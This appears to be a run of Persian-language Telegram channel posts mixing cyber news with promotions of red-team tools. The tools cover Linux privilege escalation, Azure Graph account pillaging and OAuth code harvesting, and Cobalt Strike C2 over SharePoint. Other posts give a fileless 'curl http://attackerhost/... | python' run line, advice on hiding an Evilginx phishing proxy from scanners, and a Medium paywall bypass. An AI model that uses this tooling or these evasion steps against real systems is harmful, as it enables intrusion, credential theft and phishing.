⭕️یک نیروی نفوذی سازمان اطلاعات هلند بنام اریک، عامل منتشر کننده ویروس خرابکار استاکس‌نت در سال ۲۰۰۷ بوده ، ویروسی که خرابکاری زیادی در راکتور های هسته ای ایران به وجود آورد.

https://nos.nl/artikel/2504114-nederlander-saboteerde-atoomcomplex-in-iran-den-haag-wist-niets

#stuxnet
@securation

⭕️بسته های بلند مدت اینترنت توسط اپراتورهای جمهوری اسلامی همگی از پنل نرم افزارها غیب شدن تا مردم دیگه هرهفته و ماه بسته های گرون شده رو به قیمت دوبرابر بخرند.
وزیر قطع ارتباطات جمهوری اسلامی گفته بود اپراتورها حق ندارن بسته ها رو حذف کنند.
#پشمک_مالنده

https://twitter.com/1rpwn/status/1744635321688420715?t=SV59vfHEark2ZQeS58Zlbg&s=19

⭕️ اسکریپتی توسعه داده شده است که از ابزارهای توسعه داده قبلی مانند EDRSilencer و FireBlock بهره برده است. هدف اصلی این اسکریپت، شناسایی فایل های اجرایی مختلف است که با استفاده از پلتفرم فیلترینگ ویندوز (WFP) غیر فعال شده اند. برای دستیابی به این هدف، از ماژول NtObjectManager در اسکریپت استفاده شده است.

Detection approach

There is no native way to list and interact with WFP. To do that we need to use the NtObjectManager module.

With the help of NtObjectManager we will be able to list all filters and the approach will be:

Create a list with the executables you want to check
Listed filters that block connections
Filter that list by the executables provided

#RedTeam #Evasion
@securation

⭕️ به منظور خودکارسازی فرایند Privesc در سیستم های لینوکس و یونیکس، یک ابزار توسعه داده شده است که در دسته‌بندی Missconfig های setuid/setgid و sudo permission ها و ... تمرکز دارد. این ابزار عمدتاً برای مسابقات CTF طراحی شده است، اما در محیط های واقعی نیز قابل استفاده است.

Features

Automatically exploit misconfigured sudo permissions.
Automatically exploit misconfigured suid, sgid permissions.
Automatically exploit misconfigured capabilities.
Automatically convert arbitrary file read primitive into shell by stealing SSH keys.
Automatically convert arbitrary file write primitive into shell by dropping SSH keys.
Automatically convert arbitrary file write primitive into shell by writing to cron.
Automatically convert arbitrary file write primitive into shell using LD_PRELOAD.
Single file, easy to run fileless with curl http://attackerhost/gtfonow.py | python

#RedTeam #Privesc #bypass
@securation

⭕️ دانشگاه امیر کبیر هک شده؟
میگن ۲ هزار دلار گذاشتن فروش همه چیز را


#news @securation

⭕️مدیر وبسایت #Breachedforum که محل خرید و فروش دیتابیس ها بود به 15 سال زندان در آمریکا محکوم شد.

امیدوارم روزی ایران هم اینشکلی قوانین رو سفت و سخت به کار بگیره تا هرکسی راحت جرم و جنایت رو ترویج نده.
‎#hack ‎#Prison ‎#breached ‎#Forum
@securation

⭕️‏تیم امنیت Microsoft طی یک اطلاعیه از شناسایی حمله یک گروه از هکرهای دولتی منتسب به روسیه خبر داده است.
حملاتی که تحت عنوان nation state هستن ، تحت حمایت یک نهاد جاسوسی یا دولتها هستند که از نظر تکنیکی و ابزاری بابت پشتیبانی های مالی بالا ، درصد موفق بودنشون بالاست...

https://msrc.microsoft.com/blog/2024/01/microsoft-actions-following-attack-by-nation-state-actor-midnight-blizzard/
#News #Hack #fsb #russia
@securation

⭕️ اینکه اگر توی یک کشور سالم بود ، خانوادگی سرش رو میذاشتن توی توالت و بابت این کار قانون میتونست با هرشکایت یک کاربر هزینه های کلانی جریمه از صرافی بگیره.
اما چون اینجا ایران مهد فساد هستش، همین کاربر بهش هزار دلار نشون بدی دیتای شما رو میزاره توی هارد و میاره میفروشه توی تلگرام.
همیشه قرار نیست سایت و سرورها امن بشن چون اینا بحثهای فنی قضیه هست.
بحث اصلی هرشرکت و سازمانی توی ایران فساد اخلاقی و استفاده از خلا قانونی هستش که هرکسی میتونه توی شرکت نهار بخوره و تایم خوش گذرونیشون دلقک شدن بشه با تقلیدِ ویدیوی احراز هویت های بقیه.
فکر کن چهارچوب سازمانیِ طویله ی محل کارِ این کاربر اجازه میده این "کارمندِ تُف پاک کن" دسترسی به همه بخش های دیتا و حریم خصوصی کاربران داره.
درصد بالایی از شرکتها و سازمان های ایران رو در یک توییت نشان داد.
#فاجعه_نیروی_انسانی
@securation

⭕️خانم Sylvia Serfaty استاد New York University برنده‌ی جایزه‌ی Maryam Mirzakhani Prize در سال ۲۰۲۴ شدن.
لینک توئیت
@securation

⭕️‏تنها چند ثانیه قبل از انفجار کوره مذاب توسط هکرها دو نفر از کارگران مجتمع فولاد خوزستان از اونجا فرار میکنند.
این انفجار از طریق هک سیستمهای متصل به کوره مذاب در کارخانجات فولاد ایران توسط گروه هکری ‌#گنجشک_درنده صورت گرفت، همون گروهی که پشت هکهای سیستم کارت سوخت بود و براساس شواهد وابستگیهایی به ‌#اسراییل⁩ هم داره

‏این مقاله اخیر اندی گرینبرگ ابعاد مختلف حملات ‌ #سایبری خطرناکترین (برخلاف اسمش، ‌#گنجشک_درنده ) گروه هکری فعال علیه ایران رو بررسی میکنه.
این گروه تا کنون چهار حمله موفق تاثیرگذار شامل دو بار اختلال گسترده در سامانه کارت سوخت، انفجار در کارخانجات #فولاد و #هک سیستمهای راه آهن سراسری رو در داخل ایران اجرا کرده

https://www.wired.com/story/predatory-sparrow-cyberattack-timeline/
#news #hack
@securation

⭕️ اسم سینا خیرخواه هکر ایرانی توی مسابقات #Pwn2Own میدرخشه

https://x.com/thezdi/status/1750780912533672394?t=qcm6L12Gr9EECRjA7Gh3ew&s=35

#pwn2Own #ZDI
@securation

گران ترین آسیب پذیری RCE تاریخ ایران ما رو یادآور روزهای سخت حماسه افرینی حوزه باگ بانتی انداخت 😁
https://twitter.com/1rpwn/status/1750924716708163667?t=u6RguGU9K8WZYdCxSqc1XA&s=19
#bugbounty #iranianHackers
@securation

⭕️ در پروسه Post Exploit در ‏RedTeam Azure ابزاری برای تعامل با Microsoft Graph API نوشته شده که ویژگی های مختلفی دارد.
البته باید گفت اکثریت ویژگی ها نیاز به توکن دارد که این مورد را هم پوشش داده است
از جمله ویژگی های این ابزار :

It consists of three separate parts:

A PowerShell noscript where the majority of modules are located
An HTML GUI that can leverage an access token to navigate and pillage a user's account
A simple PHP redirector for harvesting authentication codes during an OAuth flow
Main Features

Search and export email
Search and export SharePoint and OneDrive files accessible to a user
Search all Teams chats and channels visible to the user and export full conversations
Deploy malicious apps
Discover misconfigured mailboxes that are exposed
Clone security groups to carry out watering hole attacks
Find groups that can be modified directly by your user or where membership rules can be abused to gain access
Search all user attributes for specific terms
Leverage a GUI built on the Graph API to pillage a user's account
Dump conditional access policies
Dump app registrations and external apps including consent and scope to identify potentially malicious apps
Tools to complete OAuth flow during consent grant attacks
GraphRunner doesn't rely on any third-party libraries or modules
Works with Windows and Linux
Continuously refresh your token package

#RedTeam #Cloud #Azure
@securation

⭕️ Bypass Medium Paywall

A little lifehack if you, like me, come across paid articles from Medium. These sites allow you to read paid Medium articles for free:

https://freedium.cfd/<URL>
https://medium-forall.vercel.app/

#medium #premium #bypass
@securation

⭕️ ابزاری توسعه داده شده که Microsoft Graph API را اصطلاحا c2 کرده و با استفاده از ارتباط سامانه sharepoint با Microsoft Graph API ارتباطات HTTPS beaconing که با استفاده از C2 معروف Coblat Strike ایجاد شده برقرار میکند.
از ویژگی های این ابزار میتوان موارد زیر را مثال زد:

GraphStrike supports almost all normal Cobalt Strike activities to include:

Use of Proxychains through a Cobalt Strike SOCKS proxy (though it is very slow...)
Upload/Download of large files
BOFs, execute-assembly, etc.
This also includes GraphStrike integration of the sleep, exit, and remove commands to match GraphStrike Server sleep times with Beacon as well as delete files in SharePoint when a Beacon is exited or removed.

GraphStrike additionally incorporates all of the features and functionality of the original AceLdr, with some additional API's made to utilize call stack spoofing as well.

#RedTeam #C2
@securation

⭕️ اگر در حوزه RedTeam فعالیت کرده باشید، مطمئناً با Evilginx آشنا هستید. Evilginx یک ابزار است که برای دور زدن 2FA و انجام مهندسی اجتماعی و فیشینگ مورد استفاده قرار می‌گیرد. با این حال، این نوع ابزارها پس از یک مدت زمان قابل شناسایی می‌شوند و سرویس دهنده‌ها می‌توانند آن‌ها را مسدود کنند.
حال به چند تکنیک برای جلوگیری از این اتفاق می‌پردازیم.

در ابتدا، برای انجام این روش، نیاز به دو دامنه و سرور، و همچنین یک حساب Cloudflare داریم. Evilginx را روی Apache نصب کرده و از Let's Encrypt برای فعال سازی SSL استفاده می‌کنیم. سپس سایت را به Cloudflare اضافه می‌کنیم.

با فعال کردن ویژگی Temporary Protections و تنظیم شدت آن به حالت Under Attack ، می‌توانیم سایت خود را در برابر حملات مخرب محافظت کنیم. همچنین با فعال کردن ویژگی Geo-blocking، قادر خواهیم بود دسترسی ابزارهای اسکنر و scraper را قطع کنیم. همچنین، با فعال کردن ویژگی Botfight نیز می‌توانیم در برابر حملات رباتیکی که به سایت انجام می‌شوند، محافظت کنیم.

با استفاده از ویژگی Meta Refresh، دو دامنه را در اختیار داریم. یکی Evilginx و دیگری Apache. با استفاده از این روش، می‌توانیم در صورت بازدید از Evilginx، کاربر را به Apache منتقل کنیم و Meta Data را نشان دهیم. با این کار، اسکنر ها با Apache برخورد خواهند کرد.

و در نهایت، از Obfuscation برای مخفی‌سازی کدهای HTML و JS استفاده کنید تا خوانایی آن‌ها به سادگی امکان‌پذیر نباشد.

#RedTeam #OpSec
@securation